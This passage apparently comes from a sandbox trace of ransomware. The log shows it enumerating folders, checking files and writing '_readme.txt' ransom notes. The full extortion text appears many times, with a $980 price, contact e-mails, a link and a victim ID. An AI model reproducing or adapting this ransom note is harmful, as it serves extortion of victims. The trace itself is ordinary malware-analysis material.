\"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" [0201.684] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48", lpString2="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" [0201.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b16180 [0201.684] CreateFileW (lpFileName="C:\\Boot\\zh-HK\\_readme.txt" (normalized: "c:\\boot\\zh-hk\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0201.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b16180 | out: hHeap=0x2c0000) returned 1 [0201.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68060 | out: hHeap=0x2c0000) returned 1 [0201.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.684] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-HK\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0201.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.684] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0201.684] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0201.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced80 [0201.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.685] PathFindExtensionW (pszPath="C:\\Boot\\zh-HK\\bootmgr.exe.mui") returned=".mui" [0201.685] CreateFileW (lpFileName="C:\\Boot\\zh-HK\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0201.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced80 | out: hHeap=0x2c0000) returned 1 [0201.685] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0201.685] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0201.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b158f8 | out: hHeap=0x2c0000) returned 1 [0201.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0201.685] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0201.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0201.685] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0201.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.687] PathFindFileNameW (pszPath="C:\\Boot\\zh-TW\\") returned="zh-TW\\" [0201.687] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0201.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.687] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.687] PathFindFileNameW (pszPath="") returned="" [0201.687] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75020000 [0201.687] GetProcAddress (hModule=0x75020000, lpProcName="SHGetFolderPathW") returned 0x750a5708 [0201.687] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b65058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0201.687] FreeLibrary (hLibModule=0x75020000) returned 1 [0201.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.687] PathAppendW (in: pszPath="C:\\Boot\\zh-TW\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-TW\\_readme.txt") returned 1 [0201.687] PathFileExistsW (pszPath="C:\\Boot\\zh-TW\\_readme.txt") returned 0 [0201.688] lstrcpyW (in: lpString1=0x3b68060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" [0201.688] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48", lpString2="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" [0201.688] CreateFileW (lpFileName="C:\\Boot\\zh-TW\\_readme.txt" (normalized: "c:\\boot\\zh-tw\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0201.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b16180 | out: hHeap=0x2c0000) returned 1 [0201.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68060 | out: hHeap=0x2c0000) returned 1 [0201.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.688] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-TW\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0201.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.688] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0201.688] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0201.688] PathFindExtensionW (pszPath="C:\\Boot\\zh-TW\\bootmgr.exe.mui") returned=".mui" [0201.688] CreateFileW (lpFileName="C:\\Boot\\zh-TW\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0201.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32cecf0 | out: hHeap=0x2c0000) returned 1 [0201.688] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0201.688] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0201.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b158f8 | out: hHeap=0x2c0000) returned 1 [0201.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0201.688] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0201.689] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.689] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0201.689] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0201.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0201.689] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.689] PathFindFileNameW (pszPath="") returned="" [0201.689] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75020000 [0201.689] GetProcAddress (hModule=0x75020000, lpProcName="SHGetFolderPathW") returned 0x750a5708 [0201.689] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b65058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0201.689] FreeLibrary (hLibModule=0x75020000) returned 1 [0201.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0201.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced38 | out: hHeap=0x2c0000) returned 1 [0201.689] PathAppendW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", pMore="_readme.txt" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\_readme.txt") returned 1 [0201.689] PathFileExistsW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\_readme.txt") returned 1 [0201.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.690] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x88cab400, ftLastAccessTime.dwHighDateTime=0x1d60a66, ftLastWriteTime.dwLowDateTime=0x88cab400, ftLastWriteTime.dwHighDateTime=0x1d60a66, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0201.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced38 | out: hHeap=0x2c0000) returned 1 [0201.690] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 